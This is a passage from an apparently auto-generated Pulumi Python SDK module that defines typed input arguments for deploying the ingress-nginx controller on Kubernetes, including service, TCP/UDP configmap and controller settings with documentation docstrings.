pulumi.set(__self__, "external_traffic_policy", external_traffic_policy)
if health_check_node_port is not None:
pulumi.set(__self__, "health_check_node_port", health_check_node_port)
if internal is not None:
pulumi.set(__self__, "internal", internal)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if load_balancer_ips is not None:
pulumi.set(__self__, "load_balancer_ips", load_balancer_ips)
if load_balancer_source_ranges is not None:
pulumi.set(__self__, "load_balancer_source_ranges", load_balancer_source_ranges)
if node_ports is not None:
pulumi.set(__self__, "node_ports", node_ports)
if ports is not None:
pulumi.set(__self__, "ports", ports)
if session_affinity is not None:
pulumi.set(__self__, "session_affinity", session_affinity)
if target_ports is not None:
pulumi.set(__self__, "target_ports", target_ports)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="clusterIP")
def cluster_ip(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "cluster_ip")
@cluster_ip.setter
def cluster_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_ip", value)
@property
@pulumi.getter(name="enableHttp")
def enable_http(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "enable_http")
@enable_http.setter
def enable_http(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_http", value)
@property
@pulumi.getter(name="enableHttps")
def enable_https(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "enable_https")
@enable_https.setter
def enable_https(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_https", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="externalIPs")
def external_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of IP addresses at which the controller services are available Ref: https://kubernetes.io/docs/user-guide/services/#external-ips
"""
return pulumi.get(self, "external_ips")
@external_ips.setter
def external_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "external_ips", value)
@property
@pulumi.getter(name="externalTrafficPolicy")
def external_traffic_policy(self) -> Optional[pulumi.Input[str]]:
"""
Set external traffic policy to: "Local" to preserve source IP on providers supporting it. Ref: https://kubernetes.io/docs/tutorials/services/source-ip/#source-ip-for-services-with-typeloadbalancer
"""
return pulumi.get(self, "external_traffic_policy")
@external_traffic_policy.setter
def external_traffic_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "external_traffic_policy", value)
@property
@pulumi.getter(name="healthCheckNodePort")
def health_check_node_port(self) -> Optional[pulumi.Input[int]]:
"""
specifies the health check node port (numeric port number) for the service. If healthCheckNodePort isn’t specified, the service controller allocates a port from your cluster’s NodePort range. Ref: https://kubernetes.io/docs/tasks/access-application-cluster/create-external-load-balancer/#preserving-the-client-source-ip
"""
return pulumi.get(self, "health_check_node_port")
@health_check_node_port.setter
def health_check_node_port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "health_check_node_port", value)
@property
@pulumi.getter
def internal(self) -> Optional[pulumi.Input['ControllerServiceInternalArgs']]:
"""
Enables an additional internal load balancer (besides the external one). Annotations are mandatory for the load balancer to come up. Varies with the cloud service.
"""
return pulumi.get(self, "internal")
@internal.setter
def internal(self, value: Optional[pulumi.Input['ControllerServiceInternalArgs']]):
pulumi.set(self, "internal", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="loadBalancerIPs")
def load_balancer_ips(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "load_balancer_ips")
@load_balancer_ips.setter
def load_balancer_ips(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "load_balancer_ips", value)
@property
@pulumi.getter(name="loadBalancerSourceRanges")
def load_balancer_source_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "load_balancer_source_ranges")
@load_balancer_source_ranges.setter
def load_balancer_source_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "load_balancer_source_ranges", value)
@property
@pulumi.getter(name="nodePorts")
def node_ports(self) -> Optional[pulumi.Input['ControllerServiceNodePortsArgs']]:
return pulumi.get(self, "node_ports")
@node_ports.setter
def node_ports(self, value: Optional[pulumi.Input['ControllerServiceNodePortsArgs']]):
pulumi.set(self, "node_ports", value)
@property
@pulumi.getter
def ports(self) -> Optional[pulumi.Input['ControllerPortArgs']]:
return pulumi.get(self, "ports")
@ports.setter
def ports(self, value: Optional[pulumi.Input['ControllerPortArgs']]):
pulumi.set(self, "ports", value)
@property
@pulumi.getter(name="sessionAffinity")
def session_affinity(self) -> Optional[pulumi.Input[str]]:
"""
Must be either "None" or "ClientIP" if set. Kubernetes will default to "None". Ref: https://kubernetes.io/docs/concepts/services-networking/service/#virtual-ips-and-service-proxies
"""
return pulumi.get(self, "session_affinity")
@session_affinity.setter
def session_affinity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "session_affinity", value)
@property
@pulumi.getter(name="targetPorts")
def target_ports(self) -> Optional[pulumi.Input['ControllerPortArgs']]:
return pulumi.get(self, "target_ports")
@target_ports.setter
def target_ports(self, value: Optional[pulumi.Input['ControllerPortArgs']]):
pulumi.set(self, "target_ports", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class ControllerTcpArgs:
def __init__(__self__, *,
annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
config_map_namespace: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] annotations: Annotations to be added to the tcp config configmap.
"""
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if config_map_namespace is not None:
pulumi.set(__self__, "config_map_namespace", config_map_namespace)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Annotations to be added to the tcp config configmap.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="configMapNamespace")
def config_map_namespace(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "config_map_namespace")
@config_map_namespace.setter
def config_map_namespace(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "config_map_namespace", value)
@pulumi.input_type
class ControllerUdpArgs:
def __init__(__self__, *,
annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
config_map_namespace: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] annotations: Annotations to be added to the udp config configmap.
"""
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if config_map_namespace is not None:
pulumi.set(__self__, "config_map_namespace", config_map_namespace)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Annotations to be added to the udp config configmap.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="configMapNamespace")
def config_map_namespace(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "config_map_namespace")
@config_map_namespace.setter
def config_map_namespace(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "config_map_namespace", value)
@pulumi.input_type
class ControllerUpdateStrategyArgs:
def __init__(__self__, *,
rolling_update: Optional[pulumi.Input['ControllerRollingUpdateArgs']] = None,
type: Optional[pulumi.Input[str]] = None):
if rolling_update is not None:
pulumi.set(__self__, "rolling_update", rolling_update)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="rollingUpdate")
def rolling_update(self) -> Optional[pulumi.Input['ControllerRollingUpdateArgs']]:
return pulumi.get(self, "rolling_update")
@rolling_update.setter
def rolling_update(self, value: Optional[pulumi.Input['ControllerRollingUpdateArgs']]):
pulumi.set(self, "rolling_update", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class ControllerArgs:
def __init__(__self__, *,
add_headers: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
admission_webhooks: Optional[pulumi.Input['ContollerAdmissionWebhooksArgs']] = None,
affinity: Optional[pulumi.Input['pulumi_kubernetes.core.v1.AffinityArgs']] = None,
allow_snippet_annotations: Optional[pulumi.Input[bool]] = None,
annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
autoscaling: Optional[pulumi.Input['AutoscalingArgs']] = None,
autoscaling_template: Optional[pulumi.Input[Sequence[pulumi.Input['AutoscalingTemplateArgs']]]] = None,
config: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
config_annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
config_map_namespace: Optional[pulumi.Input[str]] = None,
container_name: Optional[pulumi.Input[str]] = None,
container_port: Optional[pulumi.Input['ControllerPortArgs']] = None,
custom_template: Optional[pulumi.Input['ControllerCustomTemplateArgs']] = None,
dns_config: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
dns_policy: Optional[pulumi.Input[str]] = None,
election_id: Optional[pulumi.Input[str]] = None,
enable_mimalloc: Optional[pulumi.Input[bool]] = None,
existing_psp: Optional[pulumi.Input[str]] = None,
extra_args: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
extra_containers: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.ContainerArgs']]]] = None,
extra_envs: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.EnvVarArgs']]]] = None,
extra_init_containers: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.ContainerArgs']]]] = None,
extra_volume_mounts: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeMountArgs']]]] = None,
extra_volumes: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeArgs']]]] = None,
health_check_path: Optional[pulumi.Input[str]] = None,
heath_check_host: Optional[pulumi.Input[str]] = None,
host_network: Optional[pulumi.Input[bool]] = None,
host_port: Optional[pulumi.Input['ControllerHostPortArgs']] = None,
hostname: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
image: Optional[pulumi.Input['ControllerImageArgs']] = None,
ingress_class_by_name: Optional[pulumi.Input[bool]] = None,
ingress_class_resource: Optional[pulumi.Input['ControllerIngressClassResourceArgs']] = None,
keda: Optional[pulumi.Input['KedaArgs']] = None,
kind: Optional[pulumi.Input[str]] = None,
lifecycle: Optional[pulumi.Input['pulumi_kubernetes.core.v1.LifecycleArgs']] = None,
liveness_probe: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']] = None,
maxmind_license_key: Optional[pulumi.Input[str]] = None,
metrics: Optional[pulumi.Input['ControllerMetricsArgs']] = None,
min_available: Optional[pulumi.Input[int]] = None,
min_ready_seconds: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
node_selector: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
pod_annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
pod_labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
pod_security_context: Optional[pulumi.Input['pulumi_kubernetes.core.v1.PodSecurityContextArgs']] = None,
priority_class_name: Optional[pulumi.Input[str]] = None,
proxy_set_headers: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
publish_service: Optional[pulumi.Input['ControllerPublishServiceArgs']] = None,
readiness_probe: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']] = None,
replica_count: Optional[pulumi.Input[int]] = None,
report_node_internal_ip: Optional[pulumi.Input[bool]] = None,
resources: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ResourceRequirementsArgs']] = None,
scope: Optional[pulumi.Input['ControllerScopeArgs']] = None,
service: Optional[pulumi.Input['ControllerServiceArgs']] = None,
startup_probe: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']] = None,
sysctls: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
tcp: Optional[pulumi.Input['ControllerTcpArgs']] = None,
terminate_grace_period_seconds: Optional[pulumi.Input[int]] = None,
tolerations: Optional[pulumi.Input['pulumi_kubernetes.core.v1.TolerationArgs']] = None,
topology_spread_constraints: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.TopologySpreadConstraintArgs']]]] = None,
udp: Optional[pulumi.Input['ControllerUdpArgs']] = None,
update_strategy: Optional[pulumi.Input['ControllerUpdateStrategyArgs']] = None,
watch_ingress_without_class: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]] add_headers: Will add custom headers before sending response traffic to the client according to: https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/configmap/#add-headers.
:param pulumi.Input['pulumi_kubernetes.core.v1.AffinityArgs'] affinity: Affinity and anti-affinity Ref: https://kubernetes.io/docs/concepts/configuration/assign-pod-node/#affinity-and-anti-affinity.
:param pulumi.Input[bool] allow_snippet_annotations: This configuration defines if Ingress Controller should allow users to set their own *-snippet annotations, otherwise this is forbidden / dropped when users add those annotations. Global snippets in ConfigMap are still respected.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] annotations: Annotations to be added to the controller Deployment or DaemonSet.
:param pulumi.Input['AutoscalingArgs'] autoscaling: Mutually exclusive with keda autoscaling.
:param pulumi.Input[Sequence[pulumi.Input['AutoscalingTemplateArgs']]] autoscaling_template: Custom or additional autoscaling metrics ref: https://kubernetes.io/docs/tasks/run-application/horizontal-pod-autoscale/#support-for-custom-metrics
:param pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]] config: Will add custom configuration options to Nginx https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/configmap/.
:param pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]] config_annotations: Annotations to be added to the controller config configuration configmap.
:param pulumi.Input[str] config_map_namespace: Allows customization of the configmap / nginx-configmap namespace.
:param pulumi.Input[str] container_name: Configures the controller container name.
:param pulumi.Input['ControllerPortArgs'] container_port: Configures the ports the nginx-controller listens on.
:param pulumi.Input['ControllerCustomTemplateArgs'] custom_template: Override NGINX template.
:param pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]] dns_config: Optionally customize the pod dnsConfig.
:param pulumi.Input[str] dns_policy: Optionally change this to ClusterFirstWithHostNet in case you have 'hostNetwork: true'. By default, while using host network, name resolution uses the host's DNS. If you wish nginx-controller to keep resolving names inside the k8s network, use ClusterFirstWithHostNet.
:param pulumi.Input[str] election_id: Election ID to use for status update.
:param pulumi.Input[bool] enable_mimalloc: Enable mimalloc as a drop-in replacement for malloc. ref: https://github.com/microsoft/mimalloc.
:param pulumi.Input[str] existing_psp: Use an existing PSP instead of creating one.
:param pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]] extra_args: Additional command line arguments to pass to nginx-ingress-controller E.g. to specify the default SSL certificate you can use `default-ssl-certificate: "<namespace>/<secret_name>"`.
:param pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.ContainerArgs']]] extra_containers: Additional containers to be added to the controller pod. See https://github.com/lemonldap-ng-controller/lemonldap-ng-controller as example.
:param pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.EnvVarArgs']]] extra_envs: Additional environment variables to set.
:param pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.ContainerArgs']]] extra_init_containers: Containers, which are run before the app containers are started. - name: init-myservice image: busybox command: ['sh', '-c', 'until nslookup myservice; do echo waiting for myservice; sleep 2; done;']
:param pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeMountArgs']]] extra_volume_mounts: Additional volumeMounts to the controller main container. - name: copy-portal-skins mountPath: /var/lib/lemonldap-ng/portal/skins
:param pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeArgs']]] extra_volumes: Additional volumes to the controller pod. - name: copy-portal-skins emptyDir: {}
:param pulumi.Input[str] health_check_path: Path of the health check endpoint. All requests received on the port defined by the healthz-port parameter are forwarded internally to this path.
:param pulumi.Input[str] heath_check_host: Address to bind the health check endpoint. It is better to set this option to the internal node address if the ingress nginx controller is running in the hostNetwork: true mode.
:param pulumi.Input[bool] host_network: Required for use with CNI based kubernetes installations (such as ones set up by kubeadm), since CNI and hostport don't mix yet. Can be deprecated once https://github.com/kubernetes/kubernetes/issues/23920 is merged.
:param pulumi.Input['ControllerHostPortArgs'] host_port: Use host ports 80 and 443. Disabled by default.
:param pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]] hostname: Optionally customize the pod hostname.
:param pulumi.Input[bool] ingress_class_by_name: Process IngressClass per name (additionally as per spec.controller).
:param pulumi.Input['ControllerIngressClassResourceArgs'] ingress_class_resource: This section refers to the creation of the IngressClass resource. IngressClass resources are supported since k8s >= 1.18 and required since k8s >= 1.19
:param pulumi.Input['KedaArgs'] keda: Mutually exclusive with hpa autoscaling.
:param pulumi.Input[str] kind: DaemonSet or Deployment.
:param pulumi.Input['pulumi_kubernetes.core.v1.LifecycleArgs'] lifecycle: Improve connection draining when ingress controller pod is deleted using a lifecycle hook: With this new hook, we increased the default terminationGracePeriodSeconds from 30 seconds to 300, allowing the draining of connections up to five minutes. If the active connections end before that, the pod will terminate gracefully at that time. To effectively take advantage of this feature, the Configmap feature worker-shutdown-timeout new value is 240s instead of 10s.
:param pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs'] liveness_probe: Liveness probe values Ref: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#container-probes.
:param pulumi.Input[str] maxmind_license_key: Maxmind license key to download GeoLite2 Databases https://blog.maxmind.com/2019/12/18/significant-changes-to-accessing-and-using-geolite2-databases.
:param pulumi.Input[int] min_ready_seconds: minReadySeconds to avoid killing pods before we are ready.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] node_selector: Node labels for controller pod assignment Ref: https://kubernetes.io/docs/user-guide/node-selection/.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] pod_annotations: Annotations to be added to controller pods.
:param pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]] pod_labels: labels to add to the pod container metadata.
:param pulumi.Input['pulumi_kubernetes.core.v1.PodSecurityContextArgs'] pod_security_context: Security Context policies for controller pods.
:param pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]] proxy_set_headers: Will add custom headers before sending traffic to backends according to https://github.com/kubernetes/ingress-nginx/tree/main/docs/examples/customization/custom-headers.
:param pulumi.Input['ControllerPublishServiceArgs'] publish_service: Allows customization of the source of the IP address or FQDN to report in the ingress status field. By default, it reads the information provided by the service. If disable, the status field reports the IP address of the node or nodes where an ingress controller pod is running.
:param pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs'] readiness_probe: Readiness probe values Ref: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#container-probes.
:param pulumi.Input[bool] report_node_internal_ip: Bare-metal considerations via the host network https://kubernetes.github.io/ingress-nginx/deploy/baremetal/#via-the-host-network Ingress status was blank because there is no Service exposing the NGINX Ingress controller in a configuration using the host network, the default --publish-service flag used in standard cloud setups does not apply.
:param pulumi.Input['pulumi_kubernetes.core.v1.ResourceRequirementsArgs'] resources: Define requests resources to avoid probe issues due to CPU utilization in busy nodes ref: https://github.com/kubernetes/ingress-nginx/issues/4735#issuecomment-551204903 Ideally, there should be no limits. https://engineering.indeedblog.com/blog/2019/12/cpu-throttling-regression-fix/
:param pulumi.Input['ControllerScopeArgs'] scope: Limit the scope of the controller.
:param pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs'] startup_probe: Startup probe values Ref: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#container-probes.
:param pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]] sysctls: See https://kubernetes.io/docs/tasks/administer-cluster/sysctl-cluster/ for notes on enabling and using sysctls.
:param pulumi.Input['ControllerTcpArgs'] tcp: Allows customization of the tcp-services-configmap.
:param pulumi.Input[int] terminate_grace_period_seconds: How long to wait for the drain of connections.
:param pulumi.Input['pulumi_kubernetes.core.v1.TolerationArgs'] tolerations: Node tolerations for server scheduling to nodes with taints Ref: https://kubernetes.io/docs/concepts/configuration/assign-pod-node/.
:param pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.TopologySpreadConstraintArgs']]] topology_spread_constraints: Topology spread constraints rely on node labels to identify the topology domain(s) that each Node is in. Ref: https://kubernetes.io/docs/concepts/workloads/pods/pod-topology-spread-constraints/.
:param pulumi.Input['ControllerUpdateStrategyArgs'] update_strategy: The update strategy to apply to the Deployment or DaemonSet.
:param pulumi.Input[bool] watch_ingress_without_class: Process Ingress objects without ingressClass annotation/ingressClassName field. Overrides value for --watch-ingress-without-class flag of the controller binary. Defaults to false.
"""
if add_headers is not None:
pulumi.set(__self__, "add_headers", add_headers)
if admission_webhooks is not None:
pulumi.set(__self__, "admission_webhooks", admission_webhooks)
if affinity is not None:
pulumi.set(__self__, "affinity", affinity)
if allow_snippet_annotations is not None:
pulumi.set(__self__, "allow_snippet_annotations", allow_snippet_annotations)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if autoscaling is not None:
pulumi.set(__self__, "autoscaling", autoscaling)
if autoscaling_template is not None:
pulumi.set(__self__, "autoscaling_template", autoscaling_template)
if config is not None:
pulumi.set(__self__, "config", config)
if config_annotations is not None:
pulumi.set(__self__, "config_annotations", config_annotations)
if config_map_namespace is not None:
pulumi.set(__self__, "config_map_namespace", config_map_namespace)
if container_name is not None:
pulumi.set(__self__, "container_name", container_name)
if container_port is not None:
pulumi.set(__self__, "container_port", container_port)
if custom_template is not None:
pulumi.set(__self__, "custom_template", custom_template)
if dns_config is not None:
pulumi.set(__self__, "dns_config", dns_config)
if dns_policy is not None:
pulumi.set(__self__, "dns_policy", dns_policy)
if election_id is not None:
pulumi.set(__self__, "election_id", election_id)
if enable_mimalloc is not None:
pulumi.set(__self__, "enable_mimalloc", enable_mimalloc)
if existing_psp is not None:
pulumi.set(__self__, "existing_psp", existing_psp)
if extra_args is not None:
pulumi.set(__self__, "extra_args", extra_args)
if extra_containers is not None:
pulumi.set(__self__, "extra_containers", extra_containers)
if extra_envs is not None:
pulumi.set(__self__, "extra_envs", extra_envs)
if extra_init_containers is not None:
pulumi.set(__self__, "extra_init_containers", extra_init_containers)
if extra_volume_mounts is not None:
pulumi.set(__self__, "extra_volume_mounts", extra_volume_mounts)
if extra_volumes is not None:
pulumi.set(__self__, "extra_volumes", extra_volumes)
if health_check_path is not None:
pulumi.set(__self__, "health_check_path", health_check_path)
if heath_check_host is not None:
pulumi.set(__self__, "heath_check_host", heath_check_host)
if host_network is not None:
pulumi.set(__self__, "host_network", host_network)
if host_port is not None:
pulumi.set(__self__, "host_port", host_port)
if hostname is not None:
pulumi.set(__self__, "hostname", hostname)
if image is not None:
pulumi.set(__self__, "image", image)
if ingress_class_by_name is not None:
pulumi.set(__self__, "ingress_class_by_name", ingress_class_by_name)
if ingress_class_resource is not None:
pulumi.set(__self__, "ingress_class_resource", ingress_class_resource)
if keda is not None:
pulumi.set(__self__, "keda", keda)
if kind is not None:
pulumi.set(__self__, "kind", kind)
if lifecycle is not None:
pulumi.set(__self__, "lifecycle", lifecycle)
if liveness_probe is not None:
pulumi.set(__self__, "liveness_probe", liveness_probe)
if maxmind_license_key is not None:
pulumi.set(__self__, "maxmind_license_key", maxmind_license_key)
if metrics is not None:
pulumi.set(__self__, "metrics", metrics)
if min_available is not None:
pulumi.set(__self__, "min_available", min_available)
if min_ready_seconds is not None:
pulumi.set(__self__, "min_ready_seconds", min_ready_seconds)
if name is not None:
pulumi.set(__self__, "name", name)
if node_selector is not None:
pulumi.set(__self__, "node_selector", node_selector)
if pod_annotations is not None:
pulumi.set(__self__, "pod_annotations", pod_annotations)
if pod_labels is not None:
pulumi.set(__self__, "pod_labels", pod_labels)
if pod_security_context is not None:
pulumi.set(__self__, "pod_security_context", pod_security_context)
if priority_class_name is not None:
pulumi.set(__self__, "priority_class_name", priority_class_name)
if proxy_set_headers is not None:
pulumi.set(__self__, "proxy_set_headers", proxy_set_headers)
if publish_service is not None:
pulumi.set(__self__, "publish_service", publish_service)
if readiness_probe is not None:
pulumi.set(__self__, "readiness_probe", readiness_probe)
if replica_count is not None:
pulumi.set(__self__, "replica_count", replica_count)
if report_node_internal_ip is not None:
pulumi.set(__self__, "report_node_internal_ip", report_node_internal_ip)
if resources is not None:
pulumi.set(__self__, "resources", resources)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if service is not None:
pulumi.set(__self__, "service", service)
if startup_probe is not None:
pulumi.set(__self__, "startup_probe", startup_probe)
if sysctls is not None:
pulumi.set(__self__, "sysctls", sysctls)
if tcp is not None:
pulumi.set(__self__, "tcp", tcp)
if terminate_grace_period_seconds is not None:
pulumi.set(__self__, "terminate_grace_period_seconds", terminate_grace_period_seconds)
if tolerations is not None:
pulumi.set(__self__, "tolerations", tolerations)
if topology_spread_constraints is not None:
pulumi.set(__self__, "topology_spread_constraints", topology_spread_constraints)
if udp is not None:
pulumi.set(__self__, "udp", udp)
if update_strategy is not None:
pulumi.set(__self__, "update_strategy", update_strategy)
if watch_ingress_without_class is not None:
pulumi.set(__self__, "watch_ingress_without_class", watch_ingress_without_class)
@property
@pulumi.getter(name="addHeaders")
def add_headers(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
"""
Will add custom headers before sending response traffic to the client according to: https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/configmap/#add-headers.
"""
return pulumi.get(self, "add_headers")
@add_headers.setter
def add_headers(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "add_headers", value)
@property
@pulumi.getter(name="admissionWebhooks")
def admission_webhooks(self) -> Optional[pulumi.Input['ContollerAdmissionWebhooksArgs']]:
return pulumi.get(self, "admission_webhooks")
@admission_webhooks.setter
def admission_webhooks(self, value: Optional[pulumi.Input['ContollerAdmissionWebhooksArgs']]):
pulumi.set(self, "admission_webhooks", value)
@property
@pulumi.getter
def affinity(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.AffinityArgs']]:
"""
Affinity and anti-affinity Ref: https://kubernetes.io/docs/concepts/configuration/assign-pod-node/#affinity-and-anti-affinity.
"""
return pulumi.get(self, "affinity")
@affinity.setter
def affinity(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.AffinityArgs']]):
pulumi.set(self, "affinity", value)
@property
@pulumi.getter(name="allowSnippetAnnotations")
def allow_snippet_annotations(self) -> Optional[pulumi.Input[bool]]:
"""
This configuration defines if Ingress Controller should allow users to set their own *-snippet annotations, otherwise this is forbidden / dropped when users add those annotations. Global snippets in ConfigMap are still respected.
"""
return pulumi.get(self, "allow_snippet_annotations")
@allow_snippet_annotations.setter
def allow_snippet_annotations(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "allow_snippet_annotations", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Annotations to be added to the controller Deployment or DaemonSet.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def autoscaling(self) -> Optional[pulumi.Input['AutoscalingArgs']]:
"""
Mutually exclusive with keda autoscaling.
"""
return pulumi.get(self, "autoscaling")
@autoscaling.setter
def autoscaling(self, value: Optional[pulumi.Input['AutoscalingArgs']]):
pulumi.set(self, "autoscaling", value)
@property
@pulumi.getter(name="autoscalingTemplate")
def autoscaling_template(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AutoscalingTemplateArgs']]]]:
"""
